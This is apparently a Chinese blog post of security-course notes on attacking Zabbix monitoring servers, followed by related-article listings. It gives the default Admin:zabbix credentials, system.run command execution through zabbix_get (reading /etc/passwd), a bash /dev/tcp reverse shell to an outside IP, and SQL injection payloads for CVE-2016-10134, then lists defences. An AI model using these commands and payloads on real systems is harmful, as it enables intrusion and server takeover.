zabbix漏洞

最新推荐文章于 2024-04-18 10:42:19 发布
最新推荐文章于 2024-04-18 10:42:19 发布
阅读量598 收藏
点赞数
分类专栏: 运维安全 笔记 文章标签: zabbix 服务器安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CN_SHzhaoyujie/article/details/103381062
版权

文章目录

1. Zabbix配置不当安全事件

  • sohu的zabbix,可导致内网渗透
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627
  • 京东某站shell直入jae内网物理机内核版本过低
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349

2. Zabbix弱口令利用

  1. zabbix默认的口令为Admin:zabbix,并且存在guest账户密码为空。
  2. Zabbix server可以远程在agent的机器上执行任意命令

3. 建立监控项

  • zabbix_get命令调用
system.run[command,<mode>] # 这个模块是agent自带的,获取服务器shell,获取root权限。
  • 反弹提权
bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1
nc -lvp 6666
  • zabbix_get命令调用:
zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]'

4. Zabbix注入

  • latest.php SQL注入漏洞(CVE-2016-10134)
Payload: latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0
# 用来宾账号的session的后6位 替换链接的sid ,即可通过user() 调用出当前的启动用户
  • 直接访问,不需要其他的东西
jsrpc.php? type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

  • 除此之外,还可以使用BurpSuite爆破口令

  • 防护措施

  1. 不要放外网
  2. 修改默认密码
  3. 禁用guest 用户
  4. 不要以root启动
  5. 401认证
  6. 备份数据 -> 升级版本
  7. 做测试找漏洞
CN_SHzhaoyujie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现-zabbix系列
aming小老弟
01-09 5583
Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。该系统支持网络监控、服务器监控、云监控和应用监控等。能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。
Zabbix登录绕过漏洞 [CVE-2022-23131].md
07-09
Zabbix登录绕过漏洞 [CVE-2022-23131]
漏洞复现】Zabbix弱口令再到命令执行Getshell
cjstang的博客
06-29 2584
Zabbix使用默认口令成功进入平台,写入shell脚本反弹shell
史上最详细Centos7安装zabbix并监控同网段主机服务实践
最新发布
weixin_59164654的博客
04-18 836
Zabbix 是一个企业级分布式开源监控解决方案,用于监控各种网络设备、服务器和应用程序的性能和可用性。它提供了实时监控、报警、可视化、自动发现等功能,可以帮助管理员有效地监控和管理大型网络环境。zabbix在进行监控时,zabbix客户端要安装在被监控设备上,负责定期收集数据,并将其发送给zabbix服务端;zabbix服务端要安装在监控设备上,其将zabbix客户端发送的数据存储的数据库中,zabbix web根据数据在前端进行展示和绘图。
zabbix弱口令批量检测
乐枕的家
04-20 3524
今天看到了乌云公开的漏洞 奇虎360某IP服务器zabbix弱口令 写了个模拟登录的批量验证脚本,整合到我的并发框架中做批量zabbix 默认口令检测 支持两种zabbix版本 Admin/zabbix代码链接: https://github.com/Xyntax/POC-T/blob/master/module/zabbix_wp.py其中使用shodan搜索出结果国内zabbix服务器46
zabbix 漏洞收集总结
sojrs_sec的博客
12-31 2644
一: 弱口令/默认账号 admin:zabbix Admin:zabbix guest: 空 二: sql注入(ave-2016-10134) 版本 2.2.x 3.3.0-3.03 1 http://192.168.239.24/latest.php?output=ajax&sid=bb3e723dc1a917a2&favobj=toggle&toggle_open_s...
【网络安全实战】某配送平台zabbix 未授权访问 + 弱口令
A1_3_9_7的博客
01-22 467
找到一个某src的子站,通过信息收集插件wappalyzer,发现ZABBIX-监控系统:使用谷歌搜索历史漏洞zabbix漏洞通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令成功进去了,挖洞就是这么简单:搜索文章还爆过未授权访问漏洞,打一波又成功进去了,已经清除缓存在拼接路径的,进去成功寻找功能点,在搜索位置输入任何东西,前端页面就会显示什么,猜测可能存在反射xss,但没什么用,继续测试ssti注入不存在,这个站还可以getshell,但是点到为止。
安全运维那些漏洞(目录版)
12-01
struts漏洞 Web服务器未及时打补丁,有解析漏洞 ...zabbix zenoss监控系统 Resin文件读取 memcache未限制访问IP JBoss问题 测试服务器外网可访问 padding oracle attack 用户名密码放在服务器上…… 其他
Vulnerability-implementation:nagios,zabbix,solr等平台一些漏洞的实现
05-01
nagios,zabbix,solr等平台一些漏洞的实现Nagios core(CVE-2016-9565)Apache Solr XXE(CVE-2017-12629)Apache Solr RCE(CVE-2017-12629)Zabbix RCE (CVE-2017-2824)Zabbix 2.0 SQL Injection漏洞的搭建、...
zabbix弱口令整改
友人A的博客
06-14 843
一、漏洞发现
Zabbix安全:破解弱口令后执行命令,获取shell
weixin_34054866的博客
11-12 794
如果你的Zabbix的Admin口令太弱或者使用了默认口令(Admin/zabbix),而被黑客破解了口令的话,Zabbix服务器在黑客面前就已经毫无抵抗力了。黑客可以创建“system.run[command,<mode>]”监控项执行命令,甚至获取服务器shell,获取root权限。 先介绍下“system.run[com...
zabbix 安装_记一次zabbix安装及漏洞利用getshell全过程
weixin_39634876的博客
12-12 1239
1 前言Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。本着其开源、安装简单等特点被广泛使用。但zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,进入后台后script等功能直接获取zabbix...
震惊——某白帽破解zabbix系统,实现命令执行,最终获取shell
平凡不平庸
05-19 1678
如果你坚持了自己的梦想,全世界都会为你让路。
CVE-2017-2824 zabbix 命令注入漏洞(未授权访问/绕过登录)
qq_41567985的博客
09-27 541
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。命令执行后,执行docker-compose ps查看容器是否全部成功启动,如果没有,可以尝试重新执行docker-compose up -d。总结一下: 其中那个多试几次就好,还有,超时时间改小一点,不要极端,不然很难反弹shell。---->可见-权限算太高。
安全基础zabbix漏洞打卡第七天
蟋蟀15型
07-23 237
本文为苏尚武老师运维安全课程课程笔记 zabbix配置不当 zabbix弱口令 zabbix注入利用 修复建议 没有更改默认口令,没有更改密码。默认口令Admin:zabbix 以及默认的guest账户没有密码 进入zabbix管理页面,添加脚本。然后执行系统命令,获取其他信息得到管理权限 监控项监控端口ip bash -i > & /dev/tcp/45.xx.xxx.x1/...
zabbix监控服务器交换机item参数参考
weixin_43219672的博客
11-02 2895
监控服务器 zabbix监控配置流程: 配置主机组、添加主机、添加监控项、模板、手动添加、添加触发器、定义用户媒介、配置告警方式和动作、手动触发告警 先在configuration中的hostname配置主机组,新建host,添加进hostname,在agent interfaces将IP地址改为监控服务器地址,可以在选择合适的templates,然后update Item:监控采集的项目,例如agent端的cpu、内存等,但是更加具体的来说,比如说cpu使用率,或者是cpu某个核的使用率或者是cpu的空闲
cve 漏洞利用 sqlmap
07-31
[1]对于Zabbix的jsrpc.php页面存在的SQL漏洞,可以使用SQLMap来进行利用。通过发送特定的请求包,可以执行SQL命令并获取数据库信息。[2]例如,可以使用以下命令来执行SQL注入攻击并获取用户名和密码:sqlmap -u ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值